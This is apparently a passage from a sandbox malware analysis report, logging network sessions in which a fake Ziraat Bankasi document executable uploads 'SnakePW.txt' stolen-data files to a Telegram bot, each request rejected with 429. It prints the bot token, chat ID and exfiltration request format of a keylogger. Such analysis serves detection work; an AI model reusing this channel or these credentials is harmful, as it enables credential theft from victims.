                                      2024-09-26 09:02:01 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd120b60779b87
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:02:01 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 32 30 62 36 30 37 37 39 62 38 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd120b60779b87Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:02:01 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:02:01 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 23
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:02:01 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 32 33 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 32 33 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 23","parameters":{"retry_after":23}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      123192.168.2.449872149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:02:02 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd125ccd940545
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:02:02 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 32 35 63 63 64 39 34 30 35 34 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd125ccd940545Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:02:02 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:02:02 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 22
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:02:02 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 32 32 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 32 32 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 22","parameters":{"retry_after":22}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      124192.168.2.449873149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:02:03 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd12ab3d99a9fe
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:02:03 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 32 61 62 33 64 39 39 61 39 66 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd12ab3d99a9feContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:02:03 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:02:03 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 21
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:02:03 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 32 31 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 32 31 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 21","parameters":{"retry_after":21}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      125192.168.2.449874149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:02:04 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd12ede91e4116
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:02:04 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 32 65 64 65 39 31 65 34 31 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd12ede91e4116Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:02:04 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:02:04 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 20
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:02:04 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 32 30 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 32 30 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 20","parameters":{"retry_after":20}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      126192.168.2.449875149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:02:05 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd13514572cb14
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:02:05 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 33 35 31 34 35 37 32 63 62 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd13514572cb14Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:02:05 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:02:05 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 19
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:02:05 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 39 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 39 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 19","parameters":{"retry_after":19}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      127192.168.2.449876149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:02:06 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd13ad63271467
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:02:06 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 33 61 64 36 33 32 37 31 34 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd13ad63271467Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:02:06 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:02:06 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 18
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:02:06 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 38 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 38 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 18","parameters":{"retry_after":18}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      128192.168.2.449877149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:02:07 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd14025a1c1cdc
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:02:07 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 34 30 32 35 61 31 63 31 63 64 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd14025a1c1cdcContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:02:07 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:02:07 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 17
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:02:07 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 37 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 37 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 17","parameters":{"retry_after":17}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      129192.168.2.449878149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:02:08 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd144bd6ecd266
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:02:08 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 34 34 62 64 36 65 63 64 32 36 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd144bd6ecd266Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:02:08 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:02:08 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 16
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:02:08 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 36 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 36 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 16","parameters":{"retry_after":16}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      130192.168.2.449879149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:02:09 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd149eedb82b6c
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:02:09 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 34 39 65 65 64 62 38 32 62 36 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd149eedb82b6cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:02:09 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:02:09 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 15
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:02:09 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 35 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 35 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 15","parameters":{"retry_after":15}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
